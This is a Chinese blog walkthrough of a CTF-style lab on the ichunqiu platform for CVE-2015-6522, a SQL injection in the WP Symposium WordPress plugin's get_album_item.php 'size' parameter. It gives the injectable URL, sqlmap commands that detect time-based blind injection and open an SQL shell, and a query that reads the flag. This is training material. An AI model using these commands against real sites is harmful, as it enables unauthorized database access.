春秋云境CVE-2015-6522

1.阅读靶场介绍

这里给出了路径是wp-symposium/get_album_item.php

涉及的参数是size

用到的方法是sql注入

这样看来思路很清晰了,直接进入靶场吧

2.启动靶场

进入靶场后如下图所示

这里博主也提一下自己打靶场的一个春秋云境的经验

凡是遇到wordpress这类型的靶场

我们都是默认/wp-content/plugins/在前面加上这两个路径哟

好了,接下来进入poc环节了

3.poc

我们直接访问这个url

https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1

会出现如下图所示的页面

这里我们直接启动sqlmap

首先我们执行的是这个命令

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch

看看会不会出现SQL注入的方法

结果是:

存在时间盲注的方式

接下来就是

执行这个语句

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch --sql-shell

最后我们会得到发现可以进入界面

然后在执行这个命令

select flag from flag

稍等片刻以后就可以找到flag了

文章到此结束,恭喜各位又攻克一个靶场

期待博主出什么春秋云景教学的请留言哟

感谢各位宝贵的时间

相关推荐
华普微HOPERF1 小时前
数字隔离器,光伏微型逆变系统中的安全核“芯”
安全
DM今天肝到几点?1 小时前
AI 安全进入「攻防同频」:Gemini 3.8 Flash Cyber 上线、Astra 触及关键级、HiddenLayer 融资 1 亿美元
网络·人工智能·深度学习·安全·语言模型·开源·知识图谱
来让爷抱一个2 小时前
2026 智能体安全实战:把护栏写进SPEC,MonkeyCode 云端跑通
人工智能·安全·机器学习
sungtv3 小时前
大型厂房钢结构施工安全生产动画聚焦哪些风险点
安全·安全生产动画
Neighbor_OldY3 小时前
云上安全配置审计与误配置修复实战:从安全组、OSS、RAM到数据库的全栈排查复盘
大数据·运维·安全·云计算
Latticy4 小时前
vulnhub系列靶机-Photographer
网络·网络安全·内网渗透·内网
磐时信息技术6 小时前
SASETalk | 当智能驾驶驶入未知场景:谈谈关于SOTIF、AI安全与工程落地的思考
人工智能·安全·预期功能安全·sotif
Chengbei117 小时前
SRC报告成稿 Skill(SRC/0day 提交稿、分层验证门、Step 式 PoC、截图铁律)
网络·人工智能·安全·web安全·自动化·系统安全
一只鹿鹿鹿8 小时前
SCM流程图参考(PPT文件)
大数据·数据库·web安全·系统安全·流程图
2601_966377138 小时前
云上系统零改造过密评|数达安全发布通关四件套
网络·安全